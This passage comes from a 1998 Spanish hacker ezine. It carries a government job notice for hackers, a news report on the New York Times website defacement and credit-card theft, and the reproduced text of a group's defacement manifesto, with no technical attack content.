  8897. <────────────────────────────────────────────────────────────────────────────>
  8898.   HACKERS DE LA FORTUNA. 
  8899.  
  8900.   10/27/98
  8901.  
  8902.   Se necesitan Hackers!!
  8903.  
  8904.   Esto es de libre distribucion.
  8905.  
  8906.   Por favor, enviar datos a sglennan@mcneiltech.com
  8907.                                                                     
  8908.         Se busca buenos Hackers en el buen sentido de la palabra para
  8909.   trabajar para el gobierno (no para el DOD o con informacion sensible) en
  8910.   aspecto de seguridad. La edad no importa, pero tiene que ser buenos, ademas
  8911.   deberan demostrar conocimiento en todo tipo de redes, especialmente Unix.
  8912.  
  8913.         Nota de - J.J.F. / Hackers Team -: Esta noticia esta dirigida a los
  8914.   Hackers americanos o que esten en suelo americano, por lo que ahi que tener
  8915.   dominio del ingles. Simplemente la hemos puesto para que veais que los
  8916.   Hackers no son esos tipos que se dedican a atacar servidores y demas
  8917.   tonterias, y que incluso los gobiernos los valoran.
  8918.  
  8919. <────────────────────────────────────────────────────────────────────────────>
  8920.   EL HACK DEL NEW YORK TIMES.
  8921.  
  8922.   November 1, 1998 3:41 PM PT
  8923.  
  8924.         Las personas que hackearon el web del New York Times en Septiembre,
  8925.   empaquetaron sus ordenadores un dia despues y se los dieron a otros para su
  8926.   proteccion personal, afirma la revista Forbes.
  8927.  
  8928.         En la edicion del Lunes, Forbes dijo que los Hackers, con los nick's
  8929.   Slut Puppy y Master Pimp, son de las 2 personas mas buscadas del
  8930.   Cyberespacio.
  8931.  
  8932.         Miembros de un grupo de Hackers conocido como Girlies, tambien han
  8933.   invadido otros servidores en Internet, incluyendo Rt66 Internet, un nuevo
  8934.   ISP Mexicano, del cual robaron un fichero que contenia miles de tarjetas de
  8935.   credito, afirma la revista.
  8936.  
  8937.         'Parece que no tiene idea de como lo hicimos o como pararnos' dice
  8938.   Slut Puppy.
  8939.                                                     
  8940.         El reportaje, basado en la exclusiva entrevista con Slut Puppy, dice
  8941.   que los hackers atacaron el Times por rabia, ellos no podian aceptar un
  8942.   video para mostrar el 13 de Sept. y estabamos enfadados, por lo que nos
  8943.   apoderamos del website y cambiamos la pagina de bienvenida por una pagina
  8944.   obscena y con desnudos. El periodico denuncio el hack al FBI y el grupo de
  8945.   delincuencia informatica del FBI en New York lo esta investigando, confirmo
  8946.   Joseph Valiquette, el portavoz del caso en el FBI.
  8947.                      
  8948.         "Ningun cargo a sido imputado y la investigacion todavia sige activa,"
  8949.   comento Valiquette.
  8950.                                                     
  8951.         Nancy Nielsen, un portavoz del periodico, prefiere mantener el
  8952.   silencio mientras en caso esta siendo investigado.
  8953.                                                  
  8954.         "Nosotros tomanos este asunto muy, muy serio y no queremos decir o
  8955.   hacer algo que obstruya el caso," comenta ella.
  8956.  
  8957.         Los hackers tuvieron control total del servidor y los tecnicos del
  8958.   Times intentaron recuperar el control, la pagina de los hackers estuvo
  8959.   durante unas 3 horas en el cyberespacio. Finalmente los tecnicos
  8960.   consiguieron apagar el servidor, el cual contiene las noticias del
  8961.   periodico, durante nueve horas.
  8962.  
  8963.         Despues del asalto, el duo empaqueto sus ordenadores y borro o
  8964.   protegio toda prueba de su crime, afirma el Forbes.
  8965.  
  8966.         Los hackers penetraron Rt66 en Abril y en Agosto, la segunda vez
  8967.   robando un fichero con 1.749 numeros de tarjetas de credito, ademas se
  8968.   jactan de a ver asaltado el Jet Propulsion Laboratory de la NASA, Motorola
  8969.   Inc. y la revista Penthouse, comenta el Forbes.
  8970.  
  8971.         'Importantes evidencias.' La cuenta no revela como los hackers lo
  8972.   hicieron, pero un portavoz del Forbes dice que los reporteros y los
  8973.   editores tienen "importantes evidencias" que no salen en la historia.
  8974.                                                              
  8975.         No se han dado detalles de las vidas personales de los hackers,
  8976.   excepto que han trabajado en la casa de 3 habitaciones de Slut Puppy
  8977.   durante seis meses de este año, una habitacion que la revista describe como
  8978.   "tan bonita, tan limpia, no parecia el tipico estereotipo hacker."
  8979.  
  8980. <────────────────────────────────────────────────────────────────────────────>
  8981.   INFORMATION WELFARE HACKEADO POR EL GRUPO SPL0IT.
  8982.  
  8983.   http://www.unilever.com/
  8984.  
  8985.   Grupo Spl0it: cellbl0ck - f0bic - jay - nostalg1c
  8986.  
  8987.   Si, esta pagina de seguridad a sido comprometida!
  8988.  
  8989.         A todos aquellos que venian a visitar la pagina original, nuestras
  8990.   disculpas, tenemos algunas cosas importantes que decir y este parece el
  8991.   unico medio para llamar vuestra atencion. Aunque puede parece una tonteria
  8992.   esto que tenemos que decir, necesitabamos un sitio importante para decirlo.
  8993.  
  8994.         El gobierno y los medios de comunicacion han contando muchas cosas
  8995.   sobre los hackers. Se supone que debes pensar que somos malas personas, que
  8996.   solo quieren desastibilizar la bolsa de Wallstreet y que tengais una vida
  8997.   infernal. Dejadme que os diga, nosotros en absoluto somos asi.
  8998.  
  8999.         Somos gente que se preocupa de la seguridad en Internet y en otras
  9000.   plataformas y redes. Sin nosotros, muchos fallos nunca serian descubiertos
  9001.   y solo serian conocidos por unos pocos elegidos, que a lo mejor harian
  9002.   mal uso de este conocimiento. (Si, los hackers maliciosos existen)
  9003.  
  9004.         Nosotros somos las personas que levantamos la voz para exigir nuestros
  9005.   derechos. No nos olvidemos que tambien son vuestros derechos. Estamos en
  9006.   contra de las injusticias que suceden en nuestro mundo, demostramos nuestro
  9007.   coraje contra el gobierno para dejar de ser como animales amaestrados. No
  9008.   les gusta esto, y por eso nos dan mala imagen. Escojen malos ejemplos de
  9009.   hackers (Analyzer, MoD, milw0rm, HFG) y te dicen que todos somos asi.
  9010.   PUES NO LO SOMOS#@&! Mirad atentamente. Nosotros somos hackers, pidiendo
  9011.   por vuestros derechos, manteniendo al gobierno alejado de vosotros y que no
  9012.   os tengan como zombies. Si no callais, entonces quien os protegera?
  9013.  
  9014.         Nosotros, los hackers, no tenemos problemas raciales. Como es
  9015.   mencionado en todos los textos de hackers, vivimos sin color de piel,
  9016.   religion o diferencias raciales. Tu [el gobierno] organizas guerras, matas
  9017.   personas, robas, nos mientes y nos haceis creer que es por nuestro bien, y
  9018.   todavia seguimos siendo los criminales. Bueno, mirad detenidamente.. Quien
  9019.   es el criminal? Los hackers, defendiendote, o el gobierno, dandote falsa
  9020.   sensacion de proteccion?
  9021.  
  9022.         Este sitio fue hackeado para llamarte la atencion. No tenemos
  9023.   intencion de destrozar nada, hacer que los dueños pierdan dinero o cualquier
  9024.   cosa. Solo queremos transmitir nuestro mensaje.
  9025.  
  9026.         Agradecimientos a:
  9027.   No|d, Rhino9, Lords of the Underground, AntiOnline, Chameleon, InterCore y
  9028.   a todas aquellas personas que han despertado nuestra conciencia.
  9029.  
  9030.         Sin agradecimientos a:
  9031.   MoD, milw0rm, Analyzer, HFG, Ashtray Lumberjacks. Vosotros dais mala imagen
  9032.   a los hackers.
  9033.  
  9034.         Para terminar, permitirme que plagie a quien nos enseño TRUTH IS A
  9035.   VIRUS Chameleon (La verdad es un virus), te queremos!
  9036.  
  9037.         (Texto extraido del texto de Mentor aunque a lo mejor no esta escrito
  9038.   correctamente, pero entiendes lo que queremos decir.)
  9039.  
  9040. <────────────────────────────────────────────────────────────────────────────>
  9041. ██████████████████████████████████████████████████████████████████████████████
  9042. <────────────────────────────────────────────────────────────────────────────>
  9043.  
  9044.         Bueno, pues aqui acaba este magnifico numero o eso pensamos y nos
  9045.   vemos en el siguiente numero, pero os aconsejamos que paseis a menudo por
  9046.   nuestro dominio, ya que aunque el ezine salga cada dos meses (mas o menos)
  9047.   en - J.J.F. / Hackers Team - seguimos trabajando en mas cosas que las iremos
  9048.   poniendo en el website.
  9049.  
  9050.         Ya sabeis para cualquier cosa que nos quieras decir, escribe a nuestro
  9051.   buzon pero no antes sin haber leido nuestro FAQ!!!!
  9052.  
  9053.   editor@jjf.org      
  9054.  
  9055.                        FELIZ AñO 1999 Y FELIZ NUEVOS HACK'S
  9056.                              - J.J.F. / HACKERS TEAM -
  9057.  
  9058. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  9059.